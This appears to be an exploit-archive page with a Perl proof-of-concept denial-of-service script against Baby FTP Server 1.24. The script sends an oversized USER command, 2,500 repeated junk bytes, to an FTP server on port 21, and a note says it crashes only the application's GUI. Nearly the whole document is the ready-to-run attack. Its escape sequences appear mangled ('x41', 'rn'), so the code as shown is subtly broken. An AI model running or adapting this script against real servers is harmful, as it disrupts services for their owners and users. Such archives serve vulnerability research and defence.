[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Baby FTP Server 1.24 - Denial Of Service
# Published : 2013-06-26
# Author :
# Previous Title : Quick TFTP Server 2.2 - Denial of Service
# Next Title : PEStudio 3.69 - Denial of Service
#!/usr/bin/perl
#
# Note from Exploit-DB (thanks @wireghoul): This PoC only crashes the GUI for the application,
# not the server itself.
#
###################################################################
#
# Exploit Title: Baby FTP Server Version 1.24 Denial Of Service
# Date: 2013/6/25
# Exploit Author: Chako
# Vendor Homepage: http://www.pablosoftwaresolutions.com/html/baby_ftp_server.html
# Software Download Link: http://www.pablosoftwaresolutions.com/files/babyftp.zip
# Version: 1.24
# Tested on: Windows 7
# Description:
# A bug discovered in Baby FTP Server Version 1.24 allows an attacker
# to cause a Denial of Service using a specially crafted request(USER, PASS...etc).
#
###################################################################
use IO::Socket;
$TARGET = "127.0.0.1";
$PORT = 21;
$JUNK = "x41" x 2500;
$PAYLOAD = "USER ".$JUNK."rn";
#$PAYLOAD = "PASS ".$JUNK."rn";
$SOCKET = IO::Socket::INET->new(Proto=>'TCP',
PeerHost=>$TARGET,
PeerPort=>$PORT) or die "Error: $TARGET :$PORTn";
$SOCKET->send($PAYLOAD);
close($SOCKET);